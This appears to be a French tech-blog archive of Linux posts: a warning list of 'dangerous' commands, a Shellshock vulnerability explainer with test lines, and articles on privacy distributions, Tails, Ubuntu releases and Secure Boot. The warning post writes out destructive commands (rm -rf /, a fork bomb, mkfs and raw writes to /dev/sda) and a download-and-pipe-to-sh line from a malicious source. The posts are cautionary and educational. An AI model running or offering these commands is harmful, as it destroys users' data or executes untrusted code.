Powered By Blogger

Rechercher sur ce blogue

Aucun message portant le libellé linux. Afficher tous les messages
Aucun message portant le libellé linux. Afficher tous les messages

vendredi 9 septembre 2016

Les 10 plus dangereuses commandes de Linux OS



 Vous ne devriez jamais exécuter sur votre machine:
Terminal Linux est l'un des programmes les plus puissants sous Linux OS. La ligne de commande sous Linux OS est très productif, utile et intéressant, cependant, il peut parfois être très dangereux, surtout lorsqu'ils traitent racine de l'utilisateur ou de l'utilisateur qui peut prendre la plupart de leurs privilèges, sudo.
Vous devez savoir exactement ce que vous faites. Cet article a été créé pour les utilisateurs de Linux simplement signaler quelques-unes des commandes du terminal, que chaque utilisateur Linux devrait réfléchir à deux fois avant de les exécuter.
Si vous ne savez pas sur Linux et que vous voulez apprendre Linux en ligne lire ce post.LIRE Suivre 10 chaînes YouTube pour apprendre Linux en ligne
Lire la suite attentivement et connaître ces commandes dangereuses linux. Assurez-vous de ne jamais exécuter ces commandes dangereuses Linux dans votre machine Linux.
1. rm -rf
La commande rm -rf / supprime tout ce qu'il peut possible, y compris les fichiers sur votre disque dur et les fichiers sur des périphériques de supports amovibles connectés. Cette commande est plus compréhensible si elle est décomposée:
2 .: () {: |: &};:
: () {: |: &} ;: Également connu sous le nom Fork Bomb est une attaque par déni de service contre un système Linux. : () {: |: &} ;: Est une fonction bash. Une fois exécuté, il se répète plusieurs fois jusqu'à ce que le système se bloque.
Vous ne pouvez vous en débarrasser en redémarrant votre système. Soyez donc prudent lors de l'exécution de cette commande sur votre shell Linux.Commandes Fork
Commandes Fork
Source: Dake sur Wikimedia CommonsLIRE Comment faire pour convertir un chargeur USB dans un ordinateur Linux
3. command> / dev / sda
La commande ci-dessus écrit la sortie de 'commande sur le bloc / dev / sda. La commande ci-dessus écrit les données brutes et tous les fichiers sur le bloc sera remplacé par les données brutes, entraînant la perte totale des données dans le bloc.
4. répertoire mv / dev / null
/ Dev / null est un autre endroit spécial - déplacer quelque chose à / dev / null est la même chose que de le détruire. Pensez à / dev / null comme un trou noir. Essentiellement, mv ~ / dev / null envoie tous vos fichiers personnels dans un trou noir.LIRE Top 10 Meilleur Kali Linux Tutoriels de sécurité pour les débutants
5. http wget: // malicious_source -O | sh
La ligne ci-dessus télécharge un script à partir du Web et l'envoie à sh, qui exécute le contenu du script. Cela peut être dangereux si vous n'êtes pas sûr de ce que le script est ou si vous ne faites pas confiance sa source - ne pas exécuter des scripts non fiables.
6. mkfs.ext3 / dev / sda
La commande ci-dessus va formater le bloc 'sda' et vous serait sûrement savoir que, après l'exécution de la commande ci-dessus votre Block (Hard Disk Drive) serait nouvelle, BRAND NEW! Sans les données, en laissant votre système dans l'étape irrécupérables.LIRE Comment faire pour exécuter Windows 98 ou Linux entièrement dans votre navigateur Chrome
7.> File
La commande ci-dessus est utilisée pour libérer le contenu du fichier. Si la commande ci-dessus est exécutée avec une erreur de frappe ou de l'ignorance comme "> xt.conf" va écrire le fichier de configuration ou tout autre système ou d'un fichier de configuration.
8. ^ foo ^ bar
Cette commande est utilisée pour modifier la commande d'exécution précédente, sans la nécessité de retaper à nouveau l'ensemble de la commande. Mais cela peut vraiment être gênant si vous ne l'avez pas pris le risque de bien vérifier le changement de commande d'origine en utilisant ^ foo ^ commande bar.LIRE Suivre 10 chaînes YouTube pour apprendre Linux en ligne


10. Décompression Bombe
Vous avez reçu un fichier compressé et vous êtes invité à extraire ce fichier qui semble être de très petite taille, mais peut-être un peu KB. En fait, ce petit fichier compressé de taille contient des données très fortement compressées.
Une fois le fichier décompressé, des centaines de Go de données est extrait qui peut remplir votre disque dur pour faire baisser les performances de votre système. Pour éviter cette situation, rappelez-vous toujours d'accepter des données provenant de sources dignes de confiance.10 Most Dangerous Linux OS Commandes Vous ne devriez jamais exécuter sur votre machine

LIRE Top 10 Meilleur Hacking gratuit Outils 2016 pour Windows et Linux


Source.:

mardi 18 août 2015

Windows 10 arrive ,allez up Tous sur Linux Mint (ça goûte la menthe)!

Marre de l'espionnage de Windows 10 ? Passez sur Linux !

Avis d'expert : Si malgré la possibilité de bloquer la collecte de données personnelles, vous jugez Windows 10 toujours trop indiscret(c'est devenu un OS Hybride orienté bureau/cloud), alors il est temps d'envisager une alternative : le bureau Linux, et notamment Linux Mint 17.2 avec l'interface Cinnamon.

Vous pouvez essayer de désactiver la collecte et le partage de données dans Windows 10, mais, mauvaise nouvelle, l'OS continuera de partager malgré tout certaines de vos données. Il reste néanmoins une solution : migrer sur Linux.
Linux Mint offre une interface comparable à celle de Windows, mais sans présenter les mêmes inconvénients en termes de collecte de données personnelles. La distribution peut par conséquent constituer une alternative sérieuse.

Pas de fuites de données persos sur Linux

Car avec Windows 10, si vous pouvez en grande partie stopper le partage de données, le paramétrage ne peut pas toujours être complet. Cortana, l'assistant personnel de Windows 10, par exemple, partagera toujours des données avec Microsoft, même lorsqu'il est désactivé.
Si vous utilisez Cortana, vous partagerez ainsi vos frappes clavier et commandes vocales avec Microsoft. Cela doit permettre à Cortana et à d'autres applications Microsoft de fonctionner de façon optimale. Mais si votre première préoccupation est la confidentialité, tirez un trait sur Cortana.
Il y a un autre problème. Voyez-vous, Windows 10 ne fonctionne pas comme un OS poste de travail Windows classique. Windows 10 est un OS hybride bureau/cloud. Et pour délivrer toutes ses fonctionnalités, Windows 10 doit exploiter différentes données, et pas seulement celles collectées par Cortana. Edge et Bing aussi exploitent des données.
Que pouvez-vous faire alors ? Android, Chrome OS, iOS et Macs OS X, à des degrés divers, partagent des données avec l'éditeur de la plateforme, en raison notamment de liens avec des services Cloud, embarqués dans l'OS.
Alors si cette situation s'apparente pour vous à une atteinte intolérable à votre confidentialité, le mieux est de conserver votre ancien système exploitation, comme Windows 7, ou alors de passer sur Linux. Mais Windows 7 ne bénéficiera pas éternellement d'un support - le support étendu est prolongé jusqu'en 2020 néanmoins.
Pour les utilisateurs Windows, je pense que Linux Mint 17.2 avec l'interface Cinnamon représente le meilleur choix.
Mint ressemble et fonctionne déjà à la manière d'un Windows XP/7, donc rien à craindre. Le bureau Linux ne requiert pas de maîtriser la ligne de commande, tout comme il est possible d'utiliser Windows sans être un expert de PowerShell.

Comment faire pour les applis Windows ? 

Pas de doute, d'autres préoccupations peuvent se poser concernant le passage à Linux. Passons-les en revue.
D'abord, l'installation de Mint. Elle s'effectue simplement. Téléchargez la dernière version de l'OS. Ensuite, copiez l'image ISO sur une clé USB comprenant Pendrive Linux Universal USB Installer. Vous pouvez aussi essayer Mint via une clé USB sans avoir à l'installer, simplement en démarrant depuis le support USB.
Si cette découverte de l'OS vous satisfait, double-cliquez sur l'icône Mint d'installation et passez à l'étape suivante. Rien ne vous oblige à écraser Windows et vous pouvez ainsi opter pour un dual boot. Votre seule décision consistera à déterminer l'espace disque à allouer à Mint. 8 Go seront amplement suffisants.
Il est également possible d'acheter un ordinateur avec Mint préinstallé. Des vendeurs comme FitPC et ZaReason commercialisent des PC sous Mint.
La question de l'OS réglée, reste la partie applicative. De nombreuses applications Windows courantes ne fonctionnent pas sur Linux, par exemple Outlook, Quicken, Office, Internet Explorer… Heureusement, il existe de multiples bonnes alternatives à ces logiciels comme Evolution, GnuCash, LibreOffice, Chrome et Firefox.
Mint, comme la plupart des distributions Linux, est livré avec nombre de ces applications préinstallées. Si vous souhaitez installer d'autres programmes, rien de plus simple grâce au Software Manager de Mint.
Si vous avez impérativement besoin d'un logiciel Windows, le Cloud peut être une solution, avec Office 365 en remplacement d'Office, par exemple. Se posera toutefois alors de nouveau la question de la confidentialité des données. Autre solution : installer des outils Windows sur Linux grâce à Crossover de CodeWeavers ou exécuter une instance Windows via une machine virtuelle VirtualBox.
S'il y a un logiciel que vous n'aurez pas à installer sur Mint, c'est un antivirus. Si la sécurité n'est pas infaillible sur Linux, comme sur aucun OS d'ailleurs, les virus sur le bureau Linux ne constituent cependant pas un problème.
Besoin de support sur Linux ? Des entreprises comme Pantek fournissent du support aux entreprises. Les particuliers peuvent eux se tourner vers les forums Mint ou des sites d'aide plus généraux, dont LinuxQuestions.
Voilà à peu près tout ce qu'il y a à faire pour passer sous Linux et Mint. Vous découvrirez que Mint et ses applications ressemblent et fonctionnent plutôt comme un Windows XP/7. Avec un bureau Linux conventionnel, contrairement à la plupart des OS "modernes" comme Windows 10, vous ne partagerez pas vos secrets avec leurs éditeurs.


Source.:

dimanche 8 mars 2015

5 distributions Linux pour vous protéger de tous les dangers


Si Edward Snowden vous a convaincu qu’il fallait lutter pour notre cyberespace de vie privée, vous pouvez participer à votre manière, en reprenant le contrôle de votre système. Adoptez un Linux ou un BSD, en alerte maximale.



Tails, le navigateur anonyme

Tails est un système d’exploitation basé sur Debian, et pas n'importe lequel s'il vous plait : il a notamment été utilisé par Edward Snowden pour échapper à la surveillance de la NSA. C'est une distribution live, ce qui veut dire que Tails n’est pas installé sur l’ordinateur, mais démarré depuis un DVD ou une clé USB. Avantage : on ne laisse aucune trace de son utilisation, y compris en RAM. Tails inclut une série d’outils d'anonymisation et de chiffrement. La connexion internet passe par les réseaux anonymes Tor ou I2P. Le navigateur web est Tor Browser, une version modifiée de Firefox. Le chiffrement du disque dur s’appuie du LUKS et les communications peuvent être sécurisées par les standards OpenPGP et OTR. La distribution est en cours de développement, les techniques employées devraient se retrouver dans d'autres systèmes Linux.
Tails, ici déguisé en Windows, inclut des outils pour chiffrer les courriers et nettoyer les métadonnées.
Tails, ici déguisé en Windows, inclut des outils pour chiffrer les courriers et nettoyer les métadonnées.
agrandir la photo
Télécharger Tails Linux
 

PFSense, l'écran total

Si vous n'avez plus confiance dans votre opérateur ni dans la box qu'il fournit, vous devriez vous intéresser à PFSense. Le modem-routeur des opérateurs voit en effet passer l'intégralité de votre trafic domestique, outre celui à destination d'internet. PFSense s'installe en général sur une machine dédiée et relié au modem ASDL/câble configuré en pont (bridge). C'est un routeur pare-feu très évolué, avec une interface web plutôt réussie. Des notions de réseau TCP/IP sont utiles pour personnaliser la configuration. On peut étendre les fonctions avec des modules : Anti-virus en ligne, contrôle parental, etc.
Après l\'installation sur un PC avec deux cartes réseau, PFSense est directement utilisable.
Après l'installation sur un PC avec deux cartes réseau, PFSense est directement utilisable.
agrandir la photo
Site: pfsense.org
 

PC-BSD : la sécurité par la rareté

Les pirates préfèrent s'attaquer aux systèmes les plus répandus, c'est simplement plus rentable ! PC-BSD est assez éloigné du mainstream, ce qui devrait lui éviter les menaces courantes. Il n'est même pas basé sur Linux mais sur FreeBSD, un système qui a fait ses preuves sur les serveurs depuis plus de vingt ans. La sécurité est dans la culture maison. Les mises à jour critiques sont livrées dans un court délai. Le pare-feu est actif par défaut. L'installation et la prise en main sont aisées. Les bureaux et de nombreuses applications sont communs avec Linux.
PC-BSD inclut c-shell et non bash. Ça lui a évité la vulnérabilité à Shellshock.
PC-BSD inclut c-shell et non bash. Ça lui a évité la vulnérabilité à Shellshock.
agrandir la photo
Site: pcbsd.org
 

Qubes : le Linux compartimenté

Dans les systèmes actuels, qui sont à la fois complexes et low-cost, les failles dormantes sont légion. Les criminels l'ont bien compris et recherchent ces zero-day comme des pépites. Les concepteurs de Qubes parient que leur système sera tôt ou tard hacké. Alors, ils ont divisé le système en compartiments virtuels étanches : un pour chaque contexte d'utilisation - travail, surf, etc. – et l'espace de stockage correspondant. Le réseau est également isolé dans sa bulle. Un pirate qui prendrait le contrôle d'une partie de Qubes y resterait confiné.
La machine virtuelle du navigateur, dans la fenêtre colorée en rouge, est jetable -  remise à zéro à chacun de ses démarrages.
La machine virtuelle du navigateur, dans la fenêtre colorée en rouge, est jetable - remise à zéro à chacun de ses démarrages.
agrandir la photo
Site: Sourceforge
 

Et pourquoi pas un OS sur mesure ?

Réaliser son propre système sécurisé, à partir d'une distribution que l'on aime, est un défi intéressant. Nous sommes partis d’Elementary OS, qui bénéficie des logiciels d’Ubuntu. Pour réduire encore la surface d'attaque de ce système minimal, on a enlevé les programmes inutilisés, aidé en cela par Deborphan. Exit le partage de fichiers avec Windows ! Deux réglages s'imposent : l'installation automatique des patches de sécurité et le pare-feu, avec Firestarter. On ajoute aussi Privoxy, pour filtrer le trafic web. Le résultat est un Linux raisonnablement sûr et toujours agréable à utiliser.
Il faut toujours régler le gestionnaire de mises à jour pour installer les patches de sécurité.
Il faut toujours régler le gestionnaire de mises à jour pour installer les patches de sécurité.
agrandir la photo
Site: Elementary.io
 
 
Source.:

jeudi 25 septembre 2014

Bash : la faille de sécurité très critique pour Android, Linux, et OS X


Bash bug : découverte d'une faille critique affectant des milliers de serveurs et de Mac

Un ingénieur dénommé Stéphane Chazelas a révélé hier une faille de sécurité de grande envergure, appelée Bash bug ou Shellshock, susceptible de permettre à n'importe qui d'exécuter des commandes sur toutes sortes d'ordinateurs et d'appareils.

Bien qu'il soit techniquement complètement différent, sur le papier le Bash bug est au moins aussi grave que la faille Heartbleed qui a fait la une il y a six mois. La faille vient du Bourne-Again Shell (Bash), auquel on peut effectivement faire exécuter des commandes dans des contextes dans lesquels ce devrait être impossible, en définissant des variables d'environnement en l'occurrence.

La ligne de commande servant de preuve de concept est assez explicite, même pour un profane :

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

La commande est supposée définir une fonction Bash, mais le shell exécute en fait aussitôt les commandes qui lui sont apposées, alors qu'il ne devrait pas. Dans cet exemple on se contente de retourner du texte, mais on pourrait exécuter n'importe quelle autre commande.

Bash bug

Or Bash est l'interpréteur de commandes par défaut de nombreux systèmes d'exploitation Linux et Unix (dont OS X), il est par conséquent sollicité à de nombreuses occasions, potentiellement par un serveur Web.

Dans certains cas un internaute peut donc exécuter des commandes et saboter un serveur ou obtenir des informations auxquelles il n'aurait pas accès autrement. Le bug ne permet pas d'obtenir d'élévation des privilèges, le périmètre est donc limité dans la plupart des cas. Mais un serveur DHCP malveillant par exemple peut transmettre des variables et donc faire exécuter des commandes à un ordinateur personnel lorsqu'il se connecte au réseau, or le client DHCP bénéficie souvent des droits administrateur (root).

Fort heureusement sur le marché des objets connectés, de nombreux produits reposent sur BusyBox, une distribution Linux allégée intégrant un shell différent, baptisé « Almquist shell » (ash).

Une nouvelle version corrigée de Bash a immédiatement été publiée. Elle est d'ores et déjà proposée par la plupart des distributions Linux, telles que Debian, Ubuntu, Red Hat ou Fedora. Les utilisateurs sont invités à mettre à jour leur système dès que possible. Mais certains experts en sécurité soulignent qu'elle ne comble que partiellement la faille. Il y aura donc des suites ces prochains jours, que nous ne manquerons pas de relayer.
Si les failles de sécurité sont nombreuses au sein de nos systèmes d’exploitation, certaines sont moins dangereuses que d’autres. Mais la dernière en date découverte ce matin et qui touche à la fois Android, Linux, et OS X est ce qu’on peut appeler une faille critique puisque qu’elle affecte le Bash, système de shell le plus répandu sur ces trois OS.
Découverte par un français du nom de Stéphane Chazelas, la faille en question est présente sur la quasi-totalité des versions de Bash et permet au hacker, une fois exploitée, d’exécuter diverses commandes à distance.
faille sécurité
critique qui touche Android, Linux, et OS X.
Moins dangereuse que HeartBleed du fait que celle-ci ne pourra pas octroyer au hacker plus de privilèges qu’à l’utilisateur, cette faille de sécurité qui touche aujourd’hui Android, Linux, et OS X n’en reste pas moins redoutablement inquiétante du fait du nombre d’OS et d’appareil concernés.
En termes simples, si Bash a été configuré comme shell du système par défaut, alors, il sera tout à fait possible, pour un hacker, de lancer un code malveillant sur le serveur à partir d’une simple requête web. Elle peut donc affecter un nombre important de serveurs et être exploitée dans de nombreux contextes, à commencer par une requête web ou tout simplement à travers une application exécutant des scripts bash.
Pour vérifier si vous êtes concernés par cette faille, il vous suffit de saisir les deux lignes de commandes suivantes sur votre appareil :
env X="() { :;} ; echo shellshock" /bin/sh -c "echo completed"
env X="() { :;} ; echo shellshock" `which bash` -c "echo completed"

Si votre machine affiche successivement « shellshock » et « completed », comme sur l’image ci-dessous, cela signifie alors qu’elle est vulnérable.
faille sécurité

Comment tester sur Android

Pour tester si votre Android est affecté par cette faille, il vous suffit de télécharger et d’exécuter l’application Terminal IDE, disponible gratuitement dans le Play Store, en cliquant sur le lien ci-dessous.
Alertés par cette faille, plusieurs éditeurs de systèmes d’exploitation ont déjà commencé à déployer des patchs de sécurité :


samedi 19 avril 2014

Pourquoi Edward Snowden a utilisé Tails Linux pour organiser sa fuite


Pour communiquer avec les journalistes Glenn Greenwald et Laura Poitras, l’ex-consultant de la NSA s’est appuyé sur un projet open source relativement inconnu, mais terriblement efficace. Explications.



Outre sa messagerie chiffrée avec PGP, Edward Snowden utilisait également un autre outil informatique pour assurer la confidentialité de ses communications: le système d’exploitation Tails Linux. Comme le relate le livre « Der NSA-Komplex », qui vient d’être publié par deux journalistes du magazine Spiegel, le lanceur d’alerte a d’abord tenté d’entrer en contact avec Glenn Greenwald avec PGP, mais sans succès. A cette époque, le journaliste ne connaît rien à ces techniques de chiffrement. Il ne répond pas.
Edward Snowden se tourne alors vers la documentariste Laura Poitras, qui s’y connaît déjà plus. Après un premier échange en PGP, il lui suggère d’installer Tails Linux, pour davantage de confidentialité. Et c’est ainsi que toute l’histoire commence, les premières publications dans la presse, l’interview à Hong Kong, la fuite vers Moscou, etc.

Une épine dans le pied de la NSA

Si Snowden, ex-consultant de la NSA, a choisi Tails Linux, c’est parce qu’il était certain que ce système était l’un des plus sécurisés. Et c’est vrai : dans un document secret, la NSA estimait que ce système rendait beaucoup plus difficile les cyberattaques par le réseau (« adds severe CNE [Computer Network Exploitation, ndlr] misery to the equation »). « Cela a été un outil essentiel pour réaliser l’enquête sur le NSA », souligne Laura Poitras, sur le site de la fondationFreedom of the Press.
agrandir la photo
Pourquoi Tails Linux est-il si efficace ? Plusieurs raisons peuvent l’expliquer. Basé sur Debian, l’une des distributions les plus populaires, ce système open source n’installe rien sur l’ordinateur. Comme son nom l’indique (TAILS, The Amnesic Incognito Live System), il est démarré directement depuis un CD/DVD ou une clé USB. Tout s’exécute au niveau de la mémoire vive, aucun accès au disque dur n’est effectué. Quand l’utilisateur éteint la machine, tout est réellement effacé, il n’y laisse aucune trace.

Les développeurs préfèrent rester dans l’ombre

Le nouveau logo de Tails Linux
agrandir la photo
Par ailleurs, Tails Linux intègre toute une série d’outils pour communiquer en toute tranquillité : Tor, le célèbre protocole de communication anonyme ; OpenPGP, une version open source de PGP ; OTR, une messagerie instantanée chiffrée ; HTTPS Everywhere, pour crypter toutes les connexions avec les sites web. Enfin, comme le relate Wired.com, les développeurs de Tails restent eux-mêmes dans l’anonymat, pour éviter de subir d’éventuelles pressions de la part d’agences de renseignement, comme cela est déjà arrivé à Linus Torvalds, le créateur de Linux.
Il est intéressant de constater que pour déjouer la surveillance des agents secrets, Snowden et ses amis ne sont appuyés sur un projet dont le budget de fonctionnement n’est que d’environ 42 000 euros. Ce qui n’est rien comparé aux 15 milliards de dollars de la NSA...  
Lire aussi:
Les documents d’Edward Snowden déjà publiés, désormais accessibles par mot-clé, le 07/04/2014
Edward Snowden : « Les plus grosses révélations sont à venir », le 19/03/2014


REF.:

mercredi 10 avril 2013

Ubuntu 10.10 a 13.04 disponible

Linux - Ubuntu 10.10 disponible au téléchargement
La nouvelle version d'Ubuntu introduit un nouvel écran de démarrage, de nouveaux thèmes, des fonds d'écran personnalisables, un nouveau gestionnaire de photos et un service de synchronisation assurant une interopérabilité avec des applications Android ou iPhone.

La société Canonical, dédiée à la promotion du logiciel libre, a lancé la version 10.10 du système d'exploitation Ubuntu, développé à partir d'un noyau Linux,lancé en octoibre 2010.

Cette mouture, disponible en trois variantes (pour les ordinateurs de bureau, les netbooks et les serveurs), introduit un nouvel écran de démarrage, de nouveaux thèmes, des fonds d'écran personnalisables, un nouveau gestionnaire de photos et un service de synchronisation assurant une interopérabilité avec des applications Android ou iPhone.
Les performances d'Ubuntu ont également été améliorées, notamment pour les petits écrans.
Accessible en 25 langues dont le français, Ubuntu 10.10 est dès à présent disponible en téléchargement gratuit.


Les autres versions ubuntu sont :
NoVersionNom de codeNom de testDate de publicationDate d’obsolescence
BureauServeur

1310.10Maverick Meerkat9Alpha10 octobre 201010 avril 2012
1411.04Natty Narwhal10Alpha28 avril 2011octobre 2012
1511.10Oneiric Ocelot11Alpha13 octobre 20118 mai 2013
1612.04 LTS12Precise PangolinAlpha26 avril 201213avril 201714
1712.10Quantal Quetzal15Alpha18 octobre 201216avril 2014
1813.04Raring RingtailAlpha25 avril 201317janvier 2014

Détail version par version

Cycle 5, vers ubuntu 14.04 LTS

Parmi les orientations annoncées on trouve la compatibilité avec les appareils portables type smartphone ou tablette et l'intégration des « services en ligne ».

Ubuntu 12.10 (Quantal Quetzal)

Ubuntu 12.10 (Quantal Quetzal18, en français « quetzal quantique ») est la dernière version d'Ubuntu, sortie le 18 octobre 201216.

Cette version initie le nouveau cycle vers la prochaine version LTS (14.04) avec entre autres objectifs l'intégration de services en ligne, ce qui se traduit par exemple par l'intégration de la recherche internet ou le lancement d'application web directement depuis l'interface du bureau19.

Ubuntu 13.04 (Raring Ringtail)


Ubuntu 13.04 (Raring Ringtail20, en français « lémurien impatient ») est la prochaine version d'Ubuntu. Elle est prévue pour le 25 avril 201317.
Elle semble prévue pour être compatible avec les smartphones et tablettes, et une version avancée serait compatible avec la tablette Nexus 7 de Google21.

Cycle 4, vers ubuntu 12.04 LTS

Ubuntu 10.07

Cette dénomination désigne une déclinaison d'ubuntu 10.04 dans sa version Ubuntu Netbook Edition. Parue en juillet comme son nom l'indique, elle est notamment compatible avec l'architecture ARM.




jeudi 3 janvier 2013

Ubuntu Phone Des téléphones intelligents sous Linux en 2014

Ubuntu Phone - Des téléphones intelligents sous Linux en 2014
Les premières images du projet Ubuntu OS pour téléphones intelligents. 
Photo Ubuntu OS


Canonical a dévoilé mercredi 2 janvier son projet de système d'exploitation libre et mobile dérivé d'Ubuntu, la célèbre distribution de Linux.

Aussi sur Canoe.ca:
Steam se tourne vers Linux en alternative à Windows 8 Sony présente deux nouveaux Xperia 5 pouces
Produits techno: achetez intelligemment et évitez d'être déçus
Il s'agit maintenant pour l'éditeur de trouver des partenaires constructeurs afin de distribuer à grande échelle son nouvel OS dès 2014.
Ubuntu Phone comprend par défaut un gestionnaire de SMS et de courriel.
Il permet en outre le contrôle d'un appareil photo et des galeries associées.
Il dispose enfin d'un lecteur musical et d'un service de cartographie.
Système d'exploitation libre, son code va très vite être partagé avec les développeurs afin que ceux-ci puissent y développer leurs propres applications.
L'OS serait compatible avec l'ensemble des terminaux sous Android, ce qui permettra par exemple de synchroniser les données en cas de migration.
En février 2012, Canonical avait présenté une version d'Ubuntu pour Android, un premier jet de ce qui est aujourd'hui un système d'exploitation indépendant à part entière.

Des premiers terminaux équipés en 2014

L'éditeur va maintenant devoir négocier avec les constructeurs et trouver des partenaires afin de distribuer son nouvel OS.
Canonical promet les premiers téléphones intelligents équipés pour le début 2014 et fera une démonstration de son nouvel OS au CES de Las Vegas, dès le 8 janvier prochain.
 



REF.:

mercredi 2 janvier 2013

Installer Linux sur un PC Windows 8 ? Toujours la galère...



Open Source : Depuis quelques semaines, une fonctionnalité intégrée aux nouvelles générations de BIOS fait râler : le "secure boot" permet certes de sécuriser le démarrage... Mais aussi d'empêcher l'installation d'OS alternatif.

On a beau changer d'année, certaines choses semblent immuables : les efforts faits par Microsoft pour compliquer l'installation d'une distribution GNU / Linux sur un ordinateur livré avec Windows 8, par exemple, ont le don d'agacer le blogueur de ZDNet.com Steven J. Vaughan-Nichols.
Pour lui, c'est un calvaire : comme il le raconte sur son blog "Linux and Open Source", c'est "au nom de la sécurité" que l'éditeur de Redmond met des bâtons dans les roues des utilisateurs qui souhaiteraient installer un autre système d'exploitation.
Le coupable : "Secure Boot" 
Ces restrictions couvrent évidemment les distributions GNU / Linux, mais aussi les versions plus anciennes de Windows. Sans compter la quasi-impossibilité d'installer quoi que ce soit d'autre sur les appareils tournant sur Windows RT.
Le coupable : un BIOS de nouvelle génération, UEFI (Unified Extensible Firmware Interface), qui intègre la fonctionnalité "secure boot". Censée lutter contre les malwares capables de se lancer avant le système d'exploitation (rootkits), il est plutôt utile pour éviter le détournement de l'ordinateur par des programmes malicieux.
Même la Free Software Foundation (FSF), qui ne porte pas Microsoft dans son coeur, en a admis l'utilité, explique Steven J. Vaughan-Nichols. Dans l'explication fournie par la FSF, il est pourtant bien noté que dans les faits, cette fonctionnalité de démarrage sécurisé permet aussi de bloquer tout système qui ne serait pas autorisé.
Pas de souci a priori, tant que l'utilisateur a la possibilité d'autoriser les systèmes auxquels il accorde sa confiance. Y compris ceux qui ont été modifiés par lui ou des gens de confiance, et recompilés ensuite. Mais comme l'explique la FSF, Microsoft et ses partenaires ne voient pas les choses comme ça...
Impossible de démarrer autre chose que Windows 8 dans les implémentations faites par l'éditeur et les fabricants. De quoi appeler la technologie "restricted boot" (démarrage restrictif) plutôt que "secure boot (démarrage sécurisé), estime la fondation de promotion du logiciel libre. "Une restriction désastreuse pour l'utilisateur et pas du tout une fonctionnalité de sécurité."
La FSF demande donc aux fabricants implémentant "secure boot" sur l'UEFI de le faire "d'une façon que les systèmes libres puissent être installés. Pour respecter la liberté de l'utilisateur et vraiment protéger sa sécurité, les fabricants doivent soit permettre au propriétaire de l'appareil de désactiver la restriction au démarrage, soit une façon sure d'installer le système de son choix."
Vérifications empiriques 
En se basant sur ces craintes de la FSF, Steven J. Vaughan-Nichols a tenté de s'attaquer au problème de façon empirique. Comment installer Linux ? Le plus simple, pour lui : désactiver le "secure boot".
Problème n°1 : vous voilà exposé à d'éventuels rootkits, "qui sont une menace réelle," estime le blogueur. Problème n°2 : la plupart des fabricants n'ont pas prévu de procédure simple de désactivation de la fonctionnalité.
Aucune procédure universelle, et il faudra la plupart du temps passer par les paramètres du l'UEFI pour tenter de s'y retrouver. A l'utilisateur de chercher dans un menu qui pourrait s'appeler "Secure Boot Parameters" ou "Boot Mode" une option pour désactiver la fonctionnalité de démarrage sécurisé.
Et si vous souhaitez le mode secure boot actif et une distribution GNU / Linux, il vous faudra de la patience conclut notre blogueur... Canonical, Red Hat et la Fondation Linux y travaillent. Mais comme le rappelle l'expert Linux Matthew Garrett, c'est loin d'être gagné.
La Fondation Linux n'a pas encore obtenu de copie de son bootloader signée par Microsoft, Debian ne prend pas encore la fonctionnalité en charge, Ubuntu et Suse peuvent utiliser des contournements, mais le flou règne encore, pour elles comme pour les autres distributions.
Tablettes... Oubliez Linux 
Et pour les appareils fonctionnant sur puce ARM... "Vous devriez cracker Secure Boot vous-mêmes," explique Steve J. Vaughan-Nichols au sujet des appareils sous Windows RT. Les tablettes "Surface sont un système verrouillé, et devraient le rester."
Quant aux tablettes Surface sous Windows 8 Pro, attendues pour janvier sur une architecture Intel, elles devraient se rapprocher des PC quant aux problématiques de Secure Boot. Même si rien n'indique que Microsoft ne cherchera pas à restreindre encore plus la fonctionnalité, prévient le blogueur.
"Abandonnez l'idée de faire tourner Linux sur une tablette Surface," du moins pour l'instant, donc. Quelqu'un finira par réussir à contourner la protection, mais Microsoft patchera probablement ses tablettes à mesure que des failles sont exploitées.
Quant aux PC, il faudra soit désactiver l'option - et se passer de sa protection - soit acheter un PC directement sous Linux, ou au moins sans Windows 8. Ce qui là aussi n'est pas aisé.